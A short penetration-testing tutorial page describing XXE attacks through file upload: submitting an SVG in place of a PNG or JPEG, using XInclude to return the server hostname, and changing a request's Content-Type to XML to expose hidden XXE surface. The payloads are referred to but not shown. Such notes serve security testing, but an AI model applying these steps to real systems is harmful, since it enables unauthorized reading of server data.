XXE via File upload
Last updated
Last updated
Some application allow users to upload files which are processed server side Some common file formats use XML
or contain XML subcomponents
.
Examples of XML based formats are office document formats like .docx
and image formats like .svg
.
If an application allows users to upload images and process or validate these on the server after they are uploaded
If the application expects to receive a format like .png
or .jpeg
, then the image processing lib is likely to accept .svg
too
Since the SVG format uses XML, an attacker can submit a malicious SVG image and so reach hidden attack surface for XXE vulnerabilities.
First check, the client/server validation by uploading a normal .png or .jpeg file
Usually returns an error saying, the avatar is too large
.
Now intercept that request and try changing the png fromat to an XML svg format
The above payload returns us the hostname
, using the XInclude namespace reference.
The application verifies the above payload as a SVG image and then gives us a 200
Most of the POST requests have a default Content-Type
that is generated by HTML forms, such as
application/x-www-form-urlencoded
So here an Attacker can tamper, the Content-Type to an XML format.
If the application allows the content-type which is configured by the server's backend MIME type then an attacker can :
Find the hidden XXE attack surface simply by reformatting requests to use the XML format